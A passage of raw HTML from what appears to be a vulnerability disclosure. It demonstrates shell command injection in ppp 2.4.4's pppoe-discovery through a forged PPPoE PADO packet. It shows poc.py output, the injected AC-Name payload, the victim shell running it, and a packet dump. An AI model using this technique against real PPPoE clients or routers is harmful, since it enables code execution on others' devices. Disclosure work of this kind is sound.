poc.py::ex.start.<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58f7e28ed7cba833044354\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #&gt; python poc.py eth0      INFO     &#8211; available interfaces:  INFO     &#8211;    * lo  INFO     &#8211;    * eth0  INFO     &#8211;    * eth1  INFO     &#8211; sniffing on &#8216;eth0&#8217; and trying to inject &#8216;`echo 1 &gt; \/tmp\/inject1` $(touch \/tmp\/inject2)&#8217;  INFO     &#8211; waiting for PPPoED PADI&#8230;  &#8230;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cba833044354-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cba833044354-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cba833044354-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cba833044354-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cba833044354-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cba833044354-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cba833044354-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cba833044354-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cba833044354-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cba833044354-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cba833044354-1\"><span class=\"crayon-p\">#&gt; python poc.py eth0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cba833044354-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cba833044354-3\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cba833044354-4\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">available <\/span><span class=\"crayon-v\">interfaces<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cba833044354-5\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">lo<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cba833044354-6\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">eth0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cba833044354-7\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">eth1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cba833044354-8\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sniffing <\/span><span class=\"crayon-i\">on<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;eth0&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">trying <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">inject<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;`echo 1 &gt; \/tmp\/inject1` $(touch \/tmp\/inject2)&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cba833044354-9\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">waiting <\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PPPoED <\/span><span class=\"crayon-v\">PADI<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cba833044354-10\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0011 seconds] -->  <\/p>\n<p>Step 2: run pppoe-discovery # shell injection<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58f7e28ed7cbc205694439\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> ppp-2.4.4#&gt; .\/pppd\/plugins\/rp-pppoe\/pppoe-discovery -I eth0 -D debug.log  -U -S lol  Service-Name: lol  Got a cookie: 41  Access-Concentrator: `echo 1 &gt; \/tmp\/inject1` $(touch \/tmp\/inject2)  sh: 1: sysevent: not found  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;  AC-Ethernet-Address: 00:0c:29:aa:aa:aa      ppp-2.4.4#&gt; ls \/tmp\/inje*  \/tmp\/inject1   \/tmp\/inject2<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbc205694439-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbc205694439-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbc205694439-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbc205694439-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbc205694439-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbc205694439-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbc205694439-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbc205694439-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbc205694439-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbc205694439-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbc205694439-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbc205694439-12\">12<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbc205694439-1\"><span class=\"crayon-v\">ppp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">2.4.4<\/span><span class=\"crayon-p\">#&gt; .\/pppd\/plugins\/rp-pppoe\/pppoe-discovery -I eth0 -D debug.log&nbsp;&nbsp;-U -S lol<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbc205694439-2\"><span class=\"crayon-v\">Service<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Name<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">lol<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbc205694439-3\"><span class=\"crayon-i\">Got<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">41<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbc205694439-4\"><span class=\"crayon-v\">Access<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Concentrator<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-i\">echo<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">inject1<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">touch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">inject2<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbc205694439-5\"><span class=\"crayon-v\">sh<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sysevent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">found<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbc205694439-6\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbc205694439-7\"><span class=\"crayon-v\">AC<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Ethernet<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Address<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">29<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">aa<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">aa<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-e\">aa<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbc205694439-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbc205694439-9\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbc205694439-10\"><span class=\"crayon-v\">ppp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">2.4.4<\/span><span class=\"crayon-p\">#&gt; ls \/tmp\/inje*<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbc205694439-11\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">inject1<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbc205694439-12\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">inject2<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0017 seconds] -->  <\/p>\n<p>Step 3: poc.py &#8211; shows details on the received packet as well as the forged packet with the command injection<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58f7e28ed7cbf938160414\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8230;  INFO     &#8211; got PPPoED packet, checking if it is a PPPoED PADI  INFO     &#8211; PPPoED PADI detected,  ###[ PPP over Ethernet Discovery ]###    version   = 1L    type      = 1L    code      = PADI    sessionid = 0x0    len       = 15  ###[ PPPoE Tag ]###       tag_type  = Service-Name       tag_len   = 3       tag_value = &#8216;lol&#8217;  ###[ PPPoE Tag ]###          tag_type  = Host-Uniq          tag_len   = 4          tag_value = &#8216;x17\\x00x00&#8217;  ###[ PPPoE Tag ]###             tag_type  = End-Of-List             tag_len   = 0             tag_value = &#8221;  ###[ Padding ]###                load      = &#8216;x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00&#8217;  INFO     &#8211; -&gt; PPPoE Tag  INFO     &#8211; -&gt; PPPoE Tag  INFO     &#8211; got host_uniq: &#8216;x17\\x00x00&#8217;  INFO     &#8211; -&gt; PPPoE Tag  INFO     &#8211; -&gt; Padding  INFO     &#8211; sending malicious PADO&#8230;  ###[ Ethernet ]###    dst       = 00:0c:29:bb:bb:bb    src       = 00:0c:29:aa:aa:aa    type      = 0x8863  ###[ PPP over Ethernet Discovery ]###       version   = 1       type      = 1       code      = PADO       sessionid = 0x0       len       = None  ###[ PPPoE Tag ]###          tag_type  = Service-Name          tag_len   = None          tag_value = &#8216;lol&#8217;  ###[ PPPoE Tag ]###             tag_type  = Host-Uniq             tag_len   = None             tag_value = &#8216;x17\\x00x00&#8217;  ###[ PPPoE Tag ]###                tag_type  = AC-Cookie                tag_len   = None                tag_value = &#8216;A&#8217;  ###[ PPPoE Tag ]###                   tag_type  = AC-Name                   tag_len   = None                   tag_value = &#8216;`echo 1 &gt; \/tmp\/inject1` $(touch \/tmp\/inject2)&#8217;  ###[ PPPoE Tag ]###                      tag_type  = End-Of-List                      tag_len   = None                      tag_value = &#8221;  .  Sent 1 packets.  INFO     &#8211; hooray, malicious PADO sent! :) check your target!  False  INFO     &#8211; got PPPoED packet, checking if it is a PPPoED PADI<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cbf938160414-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cbf938160414-64\">64<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cbf938160414-1\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cbf938160414-2\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">got <\/span><span class=\"crayon-e\">PPPoED <\/span><span class=\"crayon-v\">packet<\/span><span 